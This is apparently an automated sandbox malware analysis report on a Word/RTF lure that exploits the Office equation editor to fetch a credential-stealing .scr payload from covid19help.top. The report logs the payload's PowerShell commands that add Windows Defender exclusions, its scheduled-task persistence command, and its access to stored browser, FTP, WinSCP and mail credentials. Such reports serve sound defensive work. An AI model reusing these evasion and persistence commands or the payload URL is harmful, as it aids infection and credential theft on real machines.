                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory written: C:\Users\user\AppData\Roaming\obimohohj75.scr base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory written: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Queries volume information: C:\Users\user\AppData\Roaming\obimohohj75.scr VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Queries volume information: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Queries volume information: C:\Users\user\AppData\Roaming\obimohohj75.scr VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Queries volume information: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe VolumeInformation
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: obimohohj75.scr PID: 3128, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: obimohohj75.scr PID: 3512, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.627290510.00000000022A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.626533099.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3512, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: pgZzUFYKXcIRkU.exe PID: 3964, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match, File source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: obimohohj75.scr PID: 3128, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: obimohohj75.scr PID: 3512, type: MEMORYSTR
MITRE ATT&CK matrix (one tactic per column; a leading number is the report's count badge on a matched technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 33 Exploitation for Client Execution | 1 DLL Side-Loading | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | 1 Credentials in Registry | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | Login Hook | Login Hook | 1 Install Root Certificate | NTDS | 1 Query Registry | Distributed Component Object Model | 21 Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 141 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 111 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1427899, Sample: Scan 368 1.doc, Startdate: 18/04/2024, Architecture: WINDOWS, Score: 100

• Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
  • WINWORD.EXE (started)
    • EQNEDT32.EXE (started)
      Network: covid19help.top 172.67.175.222, 443, 49163, CLOUDFLARENETUS, United States
      Dropped: C:\Users\user\AppData\...\obimohohj75.scr (PE32); C:\Users\user\AppData\Local\...\xobizx[1].scr (PE32)
      Signatures: Installs new ROOT certificates; Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      • obimohohj75.scr (started)
        Dropped: C:\Users\user\AppData\...\pgZzUFYKXcIRkU.exe (PE32); C:\Users\user\AppData\Local\...\tmp786B.tmp (XML)
        Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; 3 other signatures
        • obimohohj75.scr (started)
          Network: 104.26.12.205, 443, 49164, CLOUDFLARENETUS, United States; api.ipify.org
          Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Installs a global keyboard hook
        • powershell.exe (started): Installs new ROOT certificates
        • powershell.exe (started)
        • schtasks.exe (started)
    • EQNEDT32.EXE (started, second instance)
  • taskeng.exe (started)
    • pgZzUFYKXcIRkU.exe (started)
      Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; 2 other signatures
      • pgZzUFYKXcIRkU.exe (started)
        Network: 104.26.13.205, 443, 49165, CLOUDFLARENETUS, United States; api.ipify.org
        Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
      • powershell.exe (started)
      • powershell.exe (started)
      • 2 other processes

Source | Detection | Scanner | Label
Scan 368 1.doc | 47% | Virustotal |
Scan 368 1.doc | 47% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\obimohohj75.scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr | 26% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr | 47% | Virustotal |
C:\Users\user\AppData\Roaming\obimohohj75.scr | 26% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\obimohohj75.scr | 47% | Virustotal |
C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | 26% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | 47% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
covid19help.top | 25% | Virustotal |

Source | Detection | Scanner | Label
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://api.ipif8 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://covid19help.top/xobizx.scr | 24% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
covid19help.top | 172.67.175.222 | true | true | | unknown
api.ipify.org | 172.67.74.152 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://covid19help.top/xobizx.scr | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.175.222 | covid19help.top | United States | 13335 | CLOUDFLARENETUS | true
104.26.12.205 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.26.13.205 | unknown | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1427899
Start date and time: 2024-04-18 10:36:39 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes: 27
Number of new started drivers analysed: 0
